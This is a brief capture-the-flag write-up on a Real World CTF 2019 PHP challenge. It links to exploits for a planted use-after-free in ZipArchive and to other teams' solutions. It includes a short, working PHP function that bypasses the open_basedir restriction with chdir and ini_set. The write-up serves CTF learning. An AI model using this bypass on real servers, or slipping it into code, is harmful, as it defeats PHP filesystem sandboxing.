You can find my exploit here.
https://gist.github.com/wupco/29f16a4936a599a243ea3c0f9c414e71
You can get the attachment here.
https://github.com/chaitin/Real-World-CTF-2019-Quals-Attachment/tree/master/184c379a6f90b9e3fcbbdf3f57d8a388
Additional Intro
- An old path to bypass open_basedir.
    function bypass_open_basedir(){
        if(!is_dir('/tmp/ab')){
            mkdir('/tmp/ab');
        }
        chdir('/tmp/ab');
        ini_set('open_basedir','..');
        chdir('..');
        chdir('..');
        chdir('..');
        chdir('..');
        ini_set('open_basedir','/');
    }
- Detect use-after-free in ZipArchive
I've deleted a line of zip.c (without assigning zero after efree).
- exploit it.
Other awesome solutions
- libcurl heap overflow
https://blog.bushwhackers.ru/pwning-master-of-php-like-its-real-real-world-ctf/
- UAF on spl_dllist
https://github.com/junorouse/ctf/tree/master/2019/realworld/mop